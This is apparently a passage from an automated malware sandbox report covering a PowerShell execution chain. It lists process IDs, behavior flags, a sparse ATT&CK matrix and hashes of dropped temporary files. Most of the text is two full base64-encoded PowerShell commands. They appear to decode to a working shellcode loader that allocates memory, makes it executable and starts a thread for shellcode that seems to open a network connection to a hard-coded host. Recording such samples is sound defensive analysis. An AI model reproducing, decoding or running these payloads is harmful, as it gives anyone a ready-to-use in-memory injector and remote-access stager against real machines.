"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABRAGcAPQAnACQAQwBRAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUwByAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AMAAxACwAfQA2ADgALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBiACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAaAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQwBRACAALQBOAGEAbQBlACAAIgBPAEMAIgAgAC0AbgBhAG0AZQBzACAAdABKAFEAOwAkAEoAaAA9ACQASgBoAC4AcgBlAHAAbABhAGMAZQAoACIAdABKAFEAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwAiACsAIgBuACIAKwAiAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAUwByACAAPQAgACQAUwByAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBjAHMAWQBkAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAYwBzAFkAZAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAZQBuAD0AMAB4ADEAMAAwADIAOwBpAGYAIAAoACQAUwByAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADIAKQB7ACQAZQBuAD0AJABTAHIALgBMAH0AOwAkAEIAdQA9ACQASgBoADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAyACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABGAEwARAAgAD0AIAAwADsAZgBvAHIAKAAkAEIAcAA9ADAAOwAkAEIAcAAgAC0AbABlACgAJABTAHIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAQgBwACsAKwApAHsAJABKAGgAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABCAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBwACkALAAgACQAUwByAFsAJABCAHAAXQAsACAAMQApAH0AOwAkAEoAaAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABCAHUALAAgADAAeAAxADAAMAAyACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABGAEwARAApADsAJABsAGUAVwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABKAGgAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABsAGUAVwAsACQAQgB1ACwAMAAsADAALAAwACkAOwAnADsAJABHAGgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFEAZwApACkAOwAkAGEAYgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAEYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZAB1AE0AIAA9ACAAIgBDADoAXAAkAFMARgBcAHQAdAB3AFgARgBSAE4ASABcACQAUwBGACQAYQBiAFwAdgAxAC4AMABcACQAYQBiACIAOwAkAGQAdQBNACAAPQAgACQAZAB1AE0ALgByAGUAcABsAGEAYwBlACgAIgB0AHQAdwBYACIALAAgACIAcwB5AHMAIgApADsAJABkAHUATQAgAD0AIAAkAGQAdQBNAC4AcgBlAHAAbABhAGMAZQAoACIARgBSAE4ASAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAEwAVgB2ACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEwAVgB2ACcAKQB7ACQAYQBiAD0AIAAkAGQAdQBNAH0AOwAkAHcAWgA9ACIAIAAkAGEAYgAgAHUAaABFACAAJABHAGgAIgA7ACQAdwBaAD0AJAB3AFoALgByAGUAcABsAGEAYwBlACgAIgB1AGgARQAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHcAWgA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e JABDAFEAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFMAcgA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0ANwAyACwAfQAyADgALAB9ADAAZgAsAH0AYgA3ACwAfQA0AGEALAB9ADIANgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBjADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9AGEAYwAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAwACwAfQBhADgALAB9ADAAMQAsAH0ANgA4ACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQAxADEALAB9ADUAYgAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYQAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9AGUAOAAsAH0ANgA3ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZQAsAH0AMwA2ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADMALAB9AGYAOAAsAH0AMAAwACwAfQA3AGQALAB9ADIAOAAsAH0ANQA4ACwAfQA2ADgALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQAwAGIALAB9ADIAZgAsAH0AMABmACwAfQAzADAALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADcALAB9ADYAOAAsAH0ANwA1ACwAfQA2AGUALAB9ADQAZAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0ANQBlACwAfQA1AGUALAB9AGYAZgAsAH0AMABjACwAfQAyADQALAB9ADAAZgAsAH0AOAA1ACwAfQA3ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9AGUAOQAsAH0AOQBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AYwAxACwAfQBjADMALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJABKAGgAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAEMAUQAgAC0ATgBhAG0AZQAgACIATwBDACIAIAAtAG4AYQBtAGUAcwAgAHQASgBRADsAJABKAGgAPQAkAEoAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAHQASgBRACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AIgArACIAbgAiACsAIgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFMAcgAgAD0AIAAkAFMAcgAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAYwBzAFkAZAB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGMAcwBZAGQAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAGUAbgA9ADAAeAAxADAAMAAyADsAaQBmACAAKAAkAFMAcgAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAyACkAewAkAGUAbgA9ACQAUwByAC4ATAB9ADsAJABCAHUAPQAkAEoAaAA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMgAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQARgBMAEQAIAA9ACAAMAA7AGYAbwByACgAJABCAHAAPQAwADsAJABCAHAAIAAtAGwAZQAoACQAUwByAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEIAcAArACsAKQB7ACQASgBoADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQgB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEIAcAApACwAIAAkAFMAcgBbACQAQgBwAF0ALAAgADEAKQB9ADsAJABKAGgAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAQgB1ACwAIAAwAHgAMQAwADAAMgAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQARgBMAEQAKQA7ACQAbABlAFcAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQASgBoADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAdQBpAG4AdAAzADIAXQBbAGkAbgB0AF0AMAAsACQAbABlAFcALAAkAEIAdQAsADAALAAwACwAMAApADsA
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2snhol5j.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35A3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC35A2.tmp"
7⤵
PID:1192

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 940
6⤵
PID:1084

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2snhol5j.dll
Filesize
3KB

MD5
356f01084eec3e4da35aab5ccb154766

SHA1
3f46b693fa537294fb5bb2912fc6e3cf39ba39af

SHA256
35f3435e1a69d0aa3a911b7844697416c205c330eaa06ceb965162b028231490

SHA512
4370c04ee7fd97f701121465b5b1afe4afb6535327f02e2789980113056dbb00124391648d0dee1e2df2bb80370123c85cab7be47ef609b8d8e1446b75b04089

Download Submit
C:\Users\Admin\AppData\Local\Temp\2snhol5j.pdb
Filesize
7KB

MD5
cea8ce3e2ae481b2450dcf0daaedee01

SHA1
8aa0883d031317212368208599792867d52f3582

SHA256
bd12dfca6c1fc85f7acc4f27684f0d1846ef1cc941e722898b51957a981cc3b5

SHA512
ba1aa404072115b38ce201cced3e7e4edf1ddfe250bbc221e487b63450bc4ae153e7b37a1af4cec19f83de06ba1cb66c1a89839217bd06e2557a5ab007251aea

Download Submit
C:\Users\Admin\AppData\Local\Temp\BA5.tmp\BA6.tmp\BB7.bat
Filesize
9KB

MD5
19e21134e783616aad59551c22579f66

SHA1
3ffc5fd05f63f5324dce7a39c6f13020115bbeff

SHA256
f8108650b352204f19ce39887be2717a0fb3017f34f8950c86f7bdd6a28d7eb8

SHA512
84adcd0cd462473f65155bb16e4144ad462f13c71f944afa0ea8c8dc1b5a4f66d5634af155cd865770bcf498d67046f80945a82aa63e08a9624a38534787fb47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1D91.tmp
Filesize
1KB

MD5
85ae931faf0153429facb6f27972bfac

SHA1
4ec1ca82433805e76643ea93cd6abfa1a56428f2

SHA256
8668b106686a00d0d44d7210e133f6e6d66b13e7e16a432eba5faf2865cc849b

SHA512
77c67aa5e5fdeae0a19a069571b5cbbf56926e4835e3851e678896fc1232a9d798682bdd803ecf721d72223012be593334b5de2069a1999a2ae9c720e004f852

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES35A3.tmp
Filesize
1KB

MD5
84c56510fa17a60d976552089c8063a3

SHA1
4ea6d12e2b3068d18dfdd972f0b7f7dd83439390

SHA256
b04dbb8f0ed9b48fffa8502616756233c646427573573abfb76e2509429f624d

SHA512
3eea2cf2b01ba27863986e3c51dfa5ef95584dfa042a21aa8c279204c5dea9b120556452c3b5cb6391556c835678c5be0b5461a2ca25713bbfe26d06428b5bc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\nzz1uoa2.dll
Filesize
3KB

MD5
e6060d2739c34091819ca1e101a7c66f

SHA1
05a0024aa284845dab1d1c78ffa2ced9accf1703

SHA256
